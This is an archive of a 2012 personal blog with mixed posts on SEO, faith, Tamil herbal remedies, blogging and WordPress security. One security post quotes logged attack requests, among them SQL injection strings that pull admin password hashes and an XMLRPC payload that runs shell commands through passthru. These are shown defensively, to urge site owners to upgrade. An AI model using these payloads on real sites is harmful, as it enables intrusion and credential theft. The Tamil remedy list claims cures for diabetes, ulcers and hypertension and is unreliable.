Friday, September 07, 2012

Wordstream

How Google Sponsored Listing Ads are Crouding out the Google Search Results Page
© WordStream, a Google Keyword Tool, and Google AdWords Software Provider.

SEO is dead

SEO is dead as we know it. The old math of increased backlinks and stuffing keywords is now a target for Google to identify your site and bury it in the search results. SEO is no longer a math problem, it’s a human one. Social indicators are becoming key to ranking and link algorithms are being retired. It’s time for you to see the truth about SEO… and adjust accordingly.

Of course we utilized a nice baity title to attract some attention, but it’s time that someone stood up and said it. Traditional SEO is no longer a viable solution for businesses to invest in. Sure – people still utilize search engines… and we still ensure our customers are on solid, fast platforms that presents their content properly for indexing. But we’re no longer using the old methodologies of trying to figure out how to squeeze in keywords or to get backlinks by any means necessary.

A true, new SEO package incorporates conversion analysis to determine keywords, writing compelling content, making it easy for readers to share that content, employing public relations connections to find opportunities to share that content, and promoting the heck out of that content.




Lets jump on the inbound marketing wagon and read about the claims that your SEO guy is making that are irrelevant and don't net you sales.

"First page of Google. 90 Days. Guaranteed."

You've seen ads like this, right?

"Putting clorox in your mouth will whiten your teeth."

If you told someone to do that, they'd laugh at you. When someone tells you they're going to get you to "page one" - you should laugh.

Lazy SEO firms are circulating poisonous stuff. Just because someone offers you a quick fix doesn't mean it's a good long term solution.

What you should be asking is, "Okay. So, I'm on page 1. Then what?"

Your lazy SEO guy wouldn't know what to say to that... Because he doesn't want to put great content out there for you, it takes too long. Yet if you go on any SEO company's website - they've got TONS of content and a blog on it.

What's good enough for the goose? Apparently not good enough for you.

Stature doesn't sell people. Words do. Relationships do. Reputations do.

So, what do we do? We write. A lot. We're really good at it. Our writers use their analytical nature to assess who your clients are, what they're looking for and how you can help them.

Then we reverse it. We write an article or blog that solves a problem that your ideal prospect is looking to solve. We do some keyword research and plug keywords at the right frequency so it still reads smoothly and not spammy and ridiculous.

Then we go to your social networks - and we post that article to appear in the feed of your followers. Provided you've gained your followers correctly, these people have an interest in what you do, but aren't sure yet what you can do for them. The more articles and blogs you post - the more likely you are to touch on your prospective client's problem.

It doesn't stop there. We search for relevant blogs, questions in forums and industry websites - where all those other prospects are hiding and sifting through advice about their problems. The problems you're solving.

Then - they convert. Maybe not immediately. Maybe they fill out a form on your site where you've offered a whitepaper (We put that landing page and form in place. We also wrote the whitepaper). Then you have their information, but you don't just call them. You send them targeted e-mails. About their interests, because, remember? They downloaded that whitepaper.

The process is cumbersome. It's not immediate. You won't get conversions overnight. There's a lot of painstaking research, writing and promotion of content that goes on before you really start to reel in the leads. But when you get them, they're qualified.

It's no SEO. It's not about the search engines. It's about people marketing. People absorbing information and expertise and making educated decisions. They do it every day. They want to do it with your services, you're just not where they are - so they don't know you exist.

Just like you don't fall for gimmicks and get rich quick schemes - you shouldn't fall for SEO tactics. But if you're game for some hard work, the way you built your small business in the first place, the way the sales cycle is supposed to be... If you want to get qualified leads, if you really want to be rewarded by your marketing efforts... consider marketing to people, and not to search engines.

It's hard. Finding the budget. Finding the time. But you can do it if you're willing to committ to the mission and the process.

Monday, September 03, 2012

Man & BUTTERFLY

A man found a cocoon of a butterfly. One day a small opening appeared. He sat and watched the butterfly for several hours as it struggled to force its body through that little hole. Then it seemed to stop making any progress. It appeared as if it had gotten as far as it could, and it could go no further.
So the man decided to help the butterfly. He took a pair of scissors and snipped off the remaining bit of the cocoon.







The butterfly then emerged easily. But it had a swollen body and small, shriveled wings.
The man continued to watch the butterfly because he expected that, at any moment, the wings would enlarge and expand to be able to support the body, which would contract in time.
Neither happened! In fact, the butterfly spent the rest of its life crawling around with a swollen body and shriveled wings. It never was able to fly.
What the man, in his kindness and haste, did not understand was that the restricting cocoon and the struggle required for the butterfly to get through the tiny opening were God's way of forcing fluid from the body of the butterfly into its wings so that it would be ready for flight once it achieved its freedom from the cocoon.




Sometimes struggles are exactly what we need in our lives. If God allowed us to go through our lives without any obstacles, it would cripple us.
We would not be as strong as what we could have been. We could never fly!
I asked for Strength.........And God gave me Difficulties to make me strong.
I asked for Wisdom.........And God gave me Problems to solve.
I asked for Prosperity.........And God gave me Brain and Brawn to work.
I asked for Courage.........And God gave me Danger to overcome.
I asked for Love.........And God gave me Troubled people to help.
I asked for Favors.........And God gave me Opportunities.
I received nothing I wanted ........I received everything I needed!
Trust in God. Always !

Wednesday, August 08, 2012

சித்தர்கள் சொன்ன மருத்துவக் குறிப்புக்கள்..!



மூலிகை மருந்துகள்

1. சோற்றுக் கற்றாழையைச் சித்த மருத்துவத்தில் ‘குமரி’ என அழைப்பர். காய கல்பத்தில் அதுவும் ஒரு மூலிகையாகச் சேர்க்கப்படுகின்றது. அதன் நடுப்பகுதியைப் பிளந்து அதன் கசப்பான சாற்றை எ
டுத
்துச் சற்றே அலசிப் பின் மோரில் கலந்து தினம்தோறும் உண்டு வந்தால், அல்சர் போன்ற நோய்கள் குணமாகும். மேலும் உடலில் இளமைத் தன்மை அதிகரிக்கும்.

2. தினம் தோறும் ஒரு நெல்லிக்காய் சாப்பிட்டு வந்தால் நாள் பட்ட தோல் நோய்கள் குணமாகும். நோய் எதிர்ப்பு சக்தி உடலில் அதிகரிப்பதுடன், முகப்பொலிவும் உண்டாகும்.

3. சர்க்கரை நோய் கட்டுப்பட வெந்த்தயத்தைப் பொடி செய்து தினம்தோறும் ஒரு டீஸ்பூன் வெந்நீரில் கலந்து சாப்பிட்டு வர வேண்டும். மேலும் சிறியாநங்கை, பெரியாநங்கையின் சாற்றையும் பயன் படுத்தலாம்.

4. செம்பருத்திபூவைக் காயவைத்து பொடி செய்து தலையில் சீயக்காய்போலத் தேய்த்துக் குளித்து வந்தால், பொடுகுத் தொல்லை போகும். நன்கு தலை முடி வளரும். முடி கொட்டுவதும் நின்றுவிடும். மேலும் கண்களுக்கும் உடலுக்கும் குளிர்ச்சி தரும்.

5. தேனை தினமும் வெந்நீரிலோ, பாலிலோ சிறிதளவு கலந்து குடித்து வர உடலில் நோய் எதிர்ப்பு சக்தி உண்டாகும். நாள் பட்ட இருமல், சளி குணமாகும்.

6. மூச்சுக்கூட விடமுடியாமல் அதிகப்படியான இருமலாலும் சளியாலும் சிரமப்படும் குழந்தைகளுக்கு, குப்பை மேனியின் சாற்றைப் பிழிந்து சிறிதளவு கொடுத்தால் உடன் அனைத்துச் சளியும் வாந்தியாக வெளியில் வந்து விடும். ஆனால் சரியான அளவில் கொடுக்க வேண்டும். இல்லாவிட்டால் வயிற்றுப் போக்கு ஏற்படும்.

7. ஆண்மைக்குறைவைப் போக்க விரும்புபவர்கள் முருங்கை விதையைப் பொடி செய்து, பாலில் கலந்து, இரவில் படுக்கப் போகும் முன் சாப்பிட்டுவர விரைவில் பலன் கிடைக்கும். துரித ஸ்கலிதம் ஆகுபவர்களுக்கு இம்மருந்து கை கண்டதாகும்.

8. இரவில் தினந்தோறும் தூக்கம் வராமல் அவதிப்படுபவர்கள் சிறிதளவு வெந்நீரை அருந்திப் பின் படுக்கைக்குச் செல்ல வேண்டும். சர்க்கரை நோய் இல்லாதவர்கள் சிறிதளவு கருப்பட்டி அல்லது வெல்லம், அல்லது சர்க்கரையைச் சாப்பிட்ட பின் உறங்கச் செல்லலாம்
9. அருகம்புல்லைச் சாறாகவோ அல்லது பொடியாகவோ வாரம் ஒருமுறை சேர்த்துக் கொண்டால் இரத்தம் சுத்தமாவதுடன், உடல் உஷ்ணமும் தணியும்.

10. எந்த மருந்துகளை உட் கொள்பவராக இருந்தாலும் மது அருந்தும் பழக்கம் உடையவராகவோ அல்லது புகைப்பிடிப்பவராகவோ இருந்தால் அது உடலில் மருந்தின் செயல்பாட்டு வீரியத்தைக் குறை
க்கும்.

11. உடல் வெளுப்பு மற்றும் தேமல் குணமாக வெள்ளை பூண்டை வெற்றிலை சேர்த்து மசிய அரைத்து தினமும் தோலில் தேய்த்துக் குளித்து வரக் குணமாகும்.

12. குருதிக் கொதிப்பு எனப்படும் இரத்த கொதிப்பு நோய் குணமாக இரண்டு அல்லது மூன்று நாளைக்கு ஒருமுறை அகத்திக் கீரையை உணவில் சேர்க்க குணம் ஏற்படும்.

Monday, August 06, 2012

Consider blogging for these 5 reasons


Some argue that blogging is waste of time, but nothing could be further from the truth. Available tools enable all of us to express ourselves, share our views and especially knowledge and experience with a much wider audience than ever before. I really believe that everyone should and can blog.



Here are some main reasons why you should at least consider blogging if you’re not already doing it.

1. Blogging improves your storytelling skills
Blogging is about storytelling, either in words, with pictures, videos or podcasts. Storytelling is nowadays essential part of (content) marketing. But storytelling isn’t so much about talent; it’s a skill that needs constant nurture. Practice makes you better. And blogging is a perfect opportunity to polish your storytelling skills.

2. Blogging improves your communication skills
By polishing your storytelling skills, you also improve your communication skills. Are you shy, introverted, do you have low self-esteem, maybe you don’t know how to sell yourself? Blogging will help you overcome these obstacles. Communication essentially means to convey information to others. The better your communication skills the better you can sell your ideas, skills and knowledge to others. This is one of the reasons why I started blogging in the first place.

3. Sharing is caring
I am a whole-hearted advocate of the philosophy that knowledge is to be shared. Blogging can be a great platform for sharing what you’ve learned and know with others who may be interested in what you have to say and learn from you so they can improve their lives.



4. Position yourself as a thought leader
Blogging helps you build corporate and personal credibility. This is how you can position yourself as a thought leader in the marketplace. Indeed, thought leaders are perceived experts and everyone is expert in something. When done right, blogging can give thought leaders great visibility in the search engine results. Therefore, blogging connects you with others. That’s how great blogging can be.

5. Blogging builds your personal information repository
This is another reason why I decided to blog. Every day we are bombarded with tons of information we try to consume. Every one of us has his/her own way of looking for particular information. Blogging, however, helps archive information you will sooner or later need again. I regularly browse my blog and in this way remind myself of issues, solutions, and ideas I might have already forgotten, but are still useful. Sometimes it’s fun and a bit of an ego boost to check how far you’ve come.

Friday, July 27, 2012

Cancer detecting artificial brain by a Teenager in Google science fair


The second annual Google Science Fair, a science talent competition for kids ages 13 to 18, was held this month in Palo Alto, California. This year’s winner, 17-year-old Brittany Wenger, wrote a cloud-based computer program that makes breast cancer detection less invasive. She called it the “Global Neural Network Cloud Service for Breast Cancer.” Wenger created computer programs coded to think like the human brain and then used them to locate mass malignancy in breast tissue samples.

Traditional methods of finding mass malignancy use a minimally invasive, but painful, biopsy called a fine needle aspirate (FNA). Analyzing tissues collected with this method isn’t always effective and sometimes results in further invasive procedures. Wegner tested her method with 7.6 million trials to see how accurately it would detect cancerous tumors. It succeeded with a 97.4 percent success rate in prediction and 99.1 percent sensitivity to malignancy when analyzing samples collected from FNA. Employing this data to a cloud service could make it possible for doctors to assess tumors without employing more invasive testing.

For winning the competition, Wegner received $50,000, a trip to the Galapagos Islands and one year of mentoring and internship opportunities. As for her future, Wegner said in a recent interview that she plans to major in computer science in college and attend medical school.

Check your wordpress site has been hacked


If you’ve been hacked
  1. Upgrade to the latest version of WordPress.
  2. Make sure there are no backdoors or malicious code left on your system. This will be in the form of scripts left by the hacker, or modifications to existing files. Check your theme files too.
  3. Change your passwords after upgrading and make sure the hacker didn’t create another user.
  4. Edit your wp-config.php and change or create the SECRET_KEY definition. It should look like this, but do not use the same key or it won’t be very secret, will it?
    define(‘SECRET_KEY’, ’1234567890′ );

Hidden Code

The bad guys are using a number of ways to hide their hacks:
  • The simplest way is hiding their code in your php scripts. If your blog directory and files are writable by the webserver then a hacker has free reign to plant their code anywhere they like. wp-blog-header.php seems to be one place. Theme files are another. When you upgrade WordPress your theme files won’t be overwritten so make sure you double check those files for any strange code that uses theeval()command, orbase64_decode(). Here’s a code snippet taken from here:
    < ?php
    Another hack adds different code to your php files. Look for k1b0rg or keymachine.de in your php scripts and remove that offending code if you find it.
  • Check your .htaccess file in the root of you blog. If you've never edited it, it'll should look like this:
    # BEGIN WordPress

    RewriteEngine On
    RewriteBase /
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]

    # END WordPress
    That file may have this chunk of code too which is to do with the uploader:


    SecFilterEngine Off
    SecFilterScanPOST Off
  • They're also uploading PHP code disguised as jpeg files to your upload directory and adding those files to the activated plugins list. This makes it harder to find them, but not impossible:
    1. Open PHPMyAdmin and go to your blog's options table and find the active_plugins record.
    2. Edit that record. It's a long line. Scroll through it and you'll find an entry that looks like../uploads/2008/05/04/jhjyahjhnjnva.jpg. Remove that text, and make sure you remove the serialized array information for that array record. If that's beyond you, just delete the active_plugins record and reactivate all your plugins again.
    3. Check your uploads directory for that jpg file and delete it.
    4. This Youtube video shows how to do that. I don't think there's any urgent need to remove the rss_* database record but it won't hurt to do it.

Change Your Passwords

Once you've upgraded and verified that your install is clean again you must do the following:
  1. Change the passwords of all users on your system.
  2. Make sure the hacker hasn't added another user account he can use to login again.

Stop the bad guys

One way of stopping the bad guys before they've done any major damage is by doing regular backups and installing an intrusion detection system (IDS).
  • I use Backuppc to backup all my servers every night, and a simple MySQL backup script to dump the database daily.
  • The first IDS that springs to mind is Tripwire but there are many others. I just installed AIDE to track changes on this server. What it does is give me a daily report on files that have changed in that period. If a hacker has changed a script or uploaded malicious code I'll get an email within a day about it. It does take some fine tuning, but it's easy to install on Debian systems (and presumably as easy on Ubuntu and Red Hat, and even Gentoo..):
    # apt-get install aide
    # vi /etc/aide/aide.conf.d/88_aide_web
    # /usr/sbin/aideinit
    In the configuration file above I put the following:
    /home/web/ Checksums
    !/home/www/logs/.*
    !/home/web/public_html/wp-content/cache/.*
    !/home/web/.*/htdocs/wp-content/cache/.*
    That will tell AIDE to track changes to my web server folders, but ignore the logs folder and cache folders.

Please Upgrade

There is absolutely no reason not to upgrade. WordPress is famous for it's 5 minute install, but it takes time and effort to maintain it. If you don't want the hassle of upgrading, or don't know how to maintain it, why not get a hosted WordPress account at WordPress.com? Does the $10 you make from advertising every month really justify the time it takes to make sure your site, your writing, your photos and other media are safe? This isn't an advert for WordPress.com, go with any blogging system you like, but don't make life easy for the scum out there who'll take over your out of date software and use it to their advantage.

Help a friend

Check the source code of the blogs you read. The version number in the header will quickly tell you if their version of WordPress is out of date or not. Please leave a comment encouraging them to upgrade! The version number looks like this:

What does a hack look like?

I perform logging on one of my test blogs and I come across all sorts of malicious attempts to break in. Attackers use dumb bots to do their bidding so a website will be hit with all sorts of attacks, even for software that's not installed. The bots are so dumb they'll even come back again and again performing the same attacks.
Here's what I call the "ekibastos attack". It happens over a number of requests and I've seen it come from 87.118.100.81 on a regular basis. It uses a user agent called, "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)" which strangely enough doesn't show up on Google at all right now.
  1. First the attacker visits your Dashboard, and then without even checking if that was successful, he tries to access wp-admin/post.php several times using HEAD requests.
  2. Then he POSTs to wp-admin/admin-ajax.php with the following POST body:
    POST: Array
    (
    [cookie] => wordpressuser_c73ce9557defbe87cea780be67f9ae1f=xyz%27; wordpresspass_c73ce9557defbe87cea780be67f9ae1f=132;
    )
  3. When that fails, he grabs xmlrpc.php.
  4. He then POSTs to that script, exploiting an old and long fixed bug. Here's a snippet of the data.
    HTTP_RAW_POST_DATA:
    system.multicall
    methodNamepingback.extensions.getPingbacks
    params
    http://ocaoimh.ie/category/&post_type=%27) UNION ALL SELECT 10048,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 FROM wp_users WHERE ID=1%2F*
  5. That fails too so the query is repeated with similar SQL.
    http://ocaoimh.ie/category/&post_type=%27) UNION ALL SELECT 10000%2Bord(substring(user_pass,1,1)),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 FROM wp_users WHERE ID=1%2F*
  6. Then he tries a trackback:
    URL: /wp-trackback.php?tb_id=1
    POST: Array
    (
    [title] => 1
    [url] => 1
    [blog_name] => 1
    [tb_id] => 666666\'
    [1740009377] => 1
    [496546471] => 1
    )
  7. And another trackback:
    URL: /wp-trackback.php?p=1
    POST: Array
    (
    [url] => ekibastos
    [title] => ekibastos
    [excerpt] => ekibastos
    [blog_name] => +AFw-\')/*
    [charset] => UTF-7
    )
  8. Before finally going back to xmlrpc.php with this POST request:


    pingback.ping

    k1b0rg' icq: 76-86-20
    http://ocaoimh.ie/?p=k1b0rg#ls
    admin
  9. In between, he also tries the following GET requests:
    GET /index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/* HTTP/1.1
    GET /index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/* HTTP/1.1
  10. Thankfully I upgraded and all those attacks fail.
Those requests have been hitting me for months now with the latest happening 2 days ago. If that doesn't convince you that you must upgrade and check your website, I don't know what will.
PS. For completeness, here's another common XMLRPC attack I see all the time. Ironically, this actually hit my server from 189.3.105.2 after I published this post.
test.method
','')); echo
'______BEGIN______';
passthru('id');
echo
'_____FIM_____';
exit;/*
Edit: Tripwire url fixed, thanks Callum
PS. If your site has been hacked, try the WordPress Exploit Scanner which will try to find any modified files and suspicious database records.

Ways to prevent wordpress hack


There are over 5 million results in google for the keyword “prevent wordpress hack“. Everyone has their own opinion and I dont think all of these posts are updated frequently. It’s been a while I have posted here. If you have been following me on my twitter then you should know what I have been up to. First, here are few things you should know- I have made several changes to this blog.
Recently, some of my blogs were hacked. It was funny how the index file had an image of a smurf showing the middle finger with a text saying “where’s your security?” I was glad the hacker left his email address so I could thank him for mocking the security of my blogs and so, I did. The amazing part- This guy didn’t even touch the database; he didn’t even inject any shit virus. I felt it was weird but after checking out each files, I found they were all clean.
I was so involved in other projects that I didn’t pay much attention to security which is actually the most important thing here. If this dude didn’t breach my security, I wouldn’t have known it was vulnerable and hence wouldn’t have bothered to take action. Whatever it is, I have sent him a “Thank You” Note ;)
I have removed some shitty plugins, transferred to HostGator, tweaked codes and more…Today, I have decided to write a post on how I did what I did- that is, strengthen the security of my blog to keep off hackers and all creepy people. I will have a video tutorial created for this later this month but for now, check this out. Some basic tweaks can help protect all your hard earned content. Check out the following tips to prevent wordpress hack.

1. Backup
This is the first step and the most important. Before you plan on making any changes, make sure you backup your entire DB. You can do this manually or use an available plugin. I recommend backup buddy which backs up your entire wordpress blog. Unlike free plugins which only backup your database, backup buddy exports your entire database with images, files and whatever you have in your blog’s content folder- Pretty sweeet!

2. Update Wordpress Version
Second crucial step after backing up your blog is to update it to the latest version. You should always make sure that your blog’s version is up to date. WordPress team creates patches to help fix security holes. Follow wordpress feed to find out about the latest updates or you could simply login to your admin.
I would also recommend that you follow WordPress Development and BlogSecurity as they will inform you whenever a new patch/fix is released.
3. Change your Login/Password
The default wordpress login is “admin” and most hackers know that. We should change this to something else that would be difficult to guess. Something like “rogers12” or “donhoe2” is good examples. The best thing to do is delete the default admin and create a new custom login.
I suggest that you use strong passwords which include upper/lower keys, numbers and symbols. Something like “rockSTAR19!@” or “Anabel2@!” is a great example of a strong password.
Most hackers try to brute force the password so if your password is really strong as I mentioned earlier, you should be fine.
4. Wordpress keys in wp-config.php
I didn’t know much about wordpress keys but it is another important security measure. These keys work as salts for WordPress cookies thus, ensuring better encryption of user data.
Use the WordPress Key Generator to generate these keys. Now open up your wp-config.php, find the lines that look like below and simply replace with the generated ones:
define(‘AUTH_KEY’, ‘put your unique phrase here’);
define(‘SECURE_AUTH_KEY’, ‘put your unique phrase here’);
define(‘LOGGED_IN_KEY’, ‘put your unique phrase here’);
define(‘NONCE_KEY’, ‘put your unique phrase here’);
Save and you are done!

5. Install Wp Security scan 
Wp Security Scan
This plugin is the real deal. It’s simple and automates stuff. It will scan your wordpress blog for vulnerabilities and inform you if it finds any malicious codes etc. If the texts are in green in the admin panel then you should be good. However, they will not just be green; sometimes you have to make them 
6. Change Table Prefix

How to Change WordPress Table Prefix using Wp Scan
The default table prefix for wordpress is wp_ . I know that, you know it and I am sure the hacker does too. SQL Injection attacks are easier with the default table prefix because it is easier to guess. A good prefix would be “mashjg23_” or “sasdoe265_”. Changing your database table prefix is highly recommended and you can do this in two ways. The manual way requires some work and is not suitable for newbie; here’s when WP Security Scan Plugin makes your work much easier. It has a tab called “Database”. Once you are in it, you have the option to rename your entire table prefix to something that is tough to guess. Do this and you will be a step closer to strengthening your blog’s security.
7. Block Search Engine Spiders
Search engine spiders crawl over your entire blog and index every content unless they are told not to do so. We do not want to index the admin section as it contains all the sensitive information. The easiest way to prevent the crawlers from indexing the admin directory, is to create a robots.txt file in your root directory. Then place the following code in the file:
#
User-agent: *
Disallow: /cgi-bin
Disallow: /wp-admin
Disallow: /wp-includes
Disallow: /wp-content/plugins/
Disallow: /wp-content/cache/
Disallow: /wp-content/themes/
Disallow: */trackback/
Disallow: */feed/
Disallow: /*/feed/rss/$
Disallow: /category/*

8. htaccess hacks
.htaccess (hypertext access) is the default name of directory-level configuration files that allow for decentralized management of configuration when placed inside the web tree. .htaccess files are often used to specify the security restrictions for the particular directory. This is not an exact tip that falls under the list but you should know about .htaccess because you can do a lot with it to prevent wordpress hack. I am not going to get in depth for this term but I found out some sweet .htaccess hacks which can tighten your wordpress security. 
9. Protect your htaccess
After tweaking your .htaccess to protect your blog from hackers, you cannot simply leave the .htaccess open itself to attacks. The hack below prevents external access to any file with .hta . Simply place the code in your domain’s root .htaccess file.
# STRONG HTACCESS PROTECTION

order allow,deny
deny from all
satisfy all
10. No Directory Browsing
Its not a good idea to allow your visitors to browse through your entire directory. This is an easy way to find out about directory structures and this makes it easier for hackers to lookout for security holes.
In order to stop this, simply add the piece of 2 lines in your .htaccess in the root directory of your WordPress blog.
# disable directory browsing
Options All -Indexes
11. Secure wp-config.php
Wp-config.php is important because it contains all the sensitive data and configuration of your blog and therefore we must secure it through .htaccess. Simply adding the code below to the .htaccess file in the root directory can do the trick
# protect wp-config.php

Order deny,allow
Deny from all
The code denies access to the wp-config.php file to everyone
12. Limit access to wp content directory
Wp-content contains everything. This is a very important folder and you should secure it. You don’t want users to browse and get access to unwanted/other data. Users should be only able to view and access certain file types like images (jpg, gif, png), Javascript, css and XML.
Place the code below in the .htaccess file within the wp-content folder (not the root).
Order deny,allow
Deny from all

Allow from all
13. Protect wp-admin files
Wp-admin should be accessed only by you and your fellow bloggers (if any).  You may use .htaccess to restrict access and allow only specific IP addresses to this directory.
If you have static IP address and you always blog from your computer, then this can be a good option for you. However, if you run a multiple user blog then either you can opt out from this or you can allow access from a range of IPs. You can refer to Apache’s documentation on mod_access for complete instruction on how to set this up.
Copy and paste the code below to the .htaccess in wp-admin folder (not root folder)
# deny access to wp admin
order deny,allow
allow from xx.xx.xx.xx # This is your static IP
deny from all
The above code will prevent browser access to any file in these directories other than “xx.xx.xx.xx” which should be your static IP address.
There is another way you could restrict access to the directory and that is by using a password in the .htaccess. I am planning to write a detailed .htacess hack where I will include all of these.
14. Prevent script injection
I found this code on wprecipes and it works like a charm. Now you can protect your WordPress blog from script injection, and unwanted modification of _REQUEST and/or GLOBALS.
Simple copy and paste the code below to your .htaccess in the root
# protect from sql injection
Options +FollowSymLinks
RewriteEngine On
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index.php [F,L]

Safe file permission for WordPress blog
Take a note at the files permission. Wp Security scan shows this in a nice way. Browse the specific files on your root using your favorite ftp client and Chmod the files if required.
Last but not the least; you can install WordPress Firewall 2 which actually protects your blog from malicious hackers. It blocks the attempts of the hacker and notifies you when abused. Only the negative point of this plug-in is, it sometimes even blocks our action. This can really get annoying and I do not really recommend this plug-in unless you have SUPER Hackers and bots screwing up your blog. Stick with the .htaccess hacks since they do the job pretty well and your blog should be just fine.

Wednesday, July 25, 2012

King Maker Kamarajar

இது கட்டுக் கதையல்ல. கண்ணீரால் நிறைந்த நிஜம். நேற்று திருச்சி வேலுசாமி அவர்கள் எழுதிவரும் ஒரு புதிய புத்தகத்தை தொகுக்கும் வேலையில் இருந்தேன். அந்த காலம் இப்படியும் இருந்தது என உறக்கமின்றி தவித்தேன்...

“அப்போது காமராஜர் முதல்வர். பழைய சட்டமன்ற விடுதியில் மண்ணாங்கட்டி என்பவர் கீழ்மட்ட ஊழியராக இருந்தார். சட்டமன்ற ஊறப்பினர்கள் கேட்பதை வாங்கிவந்து தருவார். முதல் தளத்தில் முன்பாகவே இருக்கும் முக்கையா தேவர் அறையிலேயே இருப்பார். ஒருமுறை ‘ஏம்பா மண்ணாங்கட்டி அவசரமாக வெளியில போறன்.
குளிச்சு முடிச்சு ரெடியாகுறதுக்குள்ள இட்லிய வாங்கி வந்துடு’ என்று 100 -ருபாயை கொடுத்தார் முக்கையா தேவர். சொன்னபடியே அவர் ரெடியாகி காத்திருந்தார்.

ரொம்ப நேரம் ஓடியது. தலையில் சுமையுடன் தட்டுதடுமாறி வந்தார் மண்ணாங்கட்டி. பார்த்ததும் ’ஏன்யா. நான் அவசரமா வெளியில போகனும்னு காத்துகிட்டு இருக்கேன். இட்லி வாங்க இவ்வளவு நேரமா என்று எகிறினார் மாயாண்டி தேவர். மண்ணாங்கட்டிக்கு கோபம். என்னங்கய்யா நீங்க. இங்க ஆஸ்ட்ல அவ்வளவு இட்லி இல்லைன்னு சொல்லிட்டாங்க. மவுண்ட் ரோடெல்லாம் போய் அலைஞ்சு 100 ருபாக்கும் இட்லி வாங்குறது லேசுபட்ட காரியமா’என்று பதிலுக்கு சத்தம் போட்டார். அதுதான் மண்ணாங்கட்டி என்ற வெகுளி. அப்பாவி. அவ்வளவு வெள்ளந்தி....

அப்படியான மண்ணாங்கட்டியின் தலையில் ஒருநாள் இடி விழுந்தது. அந்த உத்தரவை படித்துகாட்டச்சொல்லி வீட்டில் அழுது புரண்டு கதறினார். ’அரசாங்க உத்தியோகத்தில் எழதப்படிக்கத் தெரியாதவர்கள் எல்லாம் இனி வேலையில் இருக்க கூடாது. பணியில் இருந்து நீக்கப்படுகிறார்கள்’ என்று காமராஜர் போட்ட உத்தரவுதான் அந்த கடிதம். இரண்டு நாள் கழித்து பழைய சட்டமன்ற உறுப்பினர் விடுதிக்கு ஓடிவந்தார். முக்கையா தேவரிடம் தரையில் விழுந்து கதறி அழுகிறார்.

என்னவென்று கேட்கிறார். ’இப்படி ஒரு உத்தரவு வந்திருக்கிறதே. என் குடும்பம் எல்லாம் நடுத்தெருவுக்கு வந்துடுச்சே. எப்படியாவது காப்பாத்துங்க ஐயா’ என்று பித்துப் பிடித்தவராக அழுகிறார். ஏதாவது சமாதானம் சொல்லனுமே என்று ’முதல்வர் ஆபிசுக்கு போன் போடுடா. கேட்டுடலாம்’ என்றார். அப்போது எல்லாம் நேரடியாக தொலைபேசும் வசதி இல்லை. ஆப்ரேட்டரிடம் கூறிவிட்டு காத்திருக்க வேண்டும். முதுல்வர் அலுவலகத்தில் யாராவது உதவியளர் எடுப்பார்கள்.

மண்ணாங்கட்டி புக்செய்த நேரம் உடனே தொடர்பு கிடைத்தது. மறுமுனையில் முதல்வர் காமராஜ். யார் நீங்கள் உங்களுக்கு என்ன வேண்டும் என்கிறார். அய்யா நான்தான் அசம்பிளி ஆஸ்டல் பியூன் மண்ணாங்கட்டி பேசுறங்க ஐயா என்றபடியே அருகில் இருந்த முக்கையா தேவரை பார்க்கிறார். அவருக்கு முதர்வர் அலுவலகத்தில் இருந்து
யாராவது உதவியாளர்கள்தான் டெலிபோனை எடுத்திருப்பார்கள் என்ற நினைப்பு. ‘எழுதப்படிக்க தெரியாதவங்க எல்லாம் முதல்வரா இருக்கறப்போ நான் பியூனா இருக்கக்கூடாதான்னு கேளுடா” என்கிறார்.

மறுமுனையில் இருந்த காமராஜரிடம் அதை அச்சுபிசகாமல் ‘ஐயா, எழுதப்படிக்க தெரியாதவங்க எல்லாம் முதல்வரா இருக்கிறப்போ நான் பியூனா இருக்ககூடாதான்னு’ தேவர் ஐயா கேட்க சொல்றாருங்க என்கிறார் மண்ணாங்கட்டி. பிறகு பேச்சில்லை....

அடுத்த 30 நிமிடத்தில் உயர் அதிகாரிகள் 3-பேர் அங்கே வந்துவிட்டார்கள். முதல்வருக்கு போன் செய்தது யார்? என்றார்கள். நான்தான் ஐயா என்று முன்னே வருகிறார் மண்ணாங்கட்டி. உங்களை கையோடு அழைத்துவரச் சொல்லியிருக்கிறார். உடனே புறப்படுங்கள் என்று நிற்கிறார்கள். அப்போதுதான் நாம் பேசியிருப்பது முதல்வரிடம்
என புரிகிறது. முக்கையா தேவருக்கும் பதட்டம். மண்ணாங்கட்டி ’ஐயா நீங்களும் வாங்க’ என்று அழுகிறார். பின்னாடியே வருகிறேன். நீ போப்பா என்று அனுப்பி வைக்கிறார். கோட்டையில் உள்ள முதல்வர் காமராஜை நோக்கி வாகனம் பறக்கிறது.

முதர்வரின் அறையில் உள்ள ஷோபாவில், கண்ணத்தில் கைவைத்தபடி கவலைதோய்ந்த முகத்தோடு உட்கார்ந்திருக்கிறார் காமராஜர். கதவு திறக்கப்படுகிறது. மண்ணாங்கட்டி முதலில் நுழைய அதிகாரிகள் சற்று ஒதுங்கி கதவோரம் நின்று கொண்டார்கள். நீங்கதான் மண்ணாங்கட்டியா...என்கிறார். ஆமாங்க ஐயா. நான்
தெரியாம பேசிட்டேன். என்னை மன்னிச்சுடுங்க ஐயா என்றபடியே கீழே விழுந்தார். அந்த கலாச்சாரம் காமராஜருக்கு பிடிக்காது. அதிகாரிகளை பார்க்க உடனே எழுப்பி நிற்க வைக்கிறார்கள். அவரை வா...வாண்னேன். வந்து பக்கதில உட்காருங்கன்னேன் என்றழைக்கிறார். மண்ணாங்கட்டி தயங்கி நிற்கிறார். காமராஜர் முறைக்க தயங்கி தயங்கி பக்கத்தில் சென்று உட்காருகிறார்.

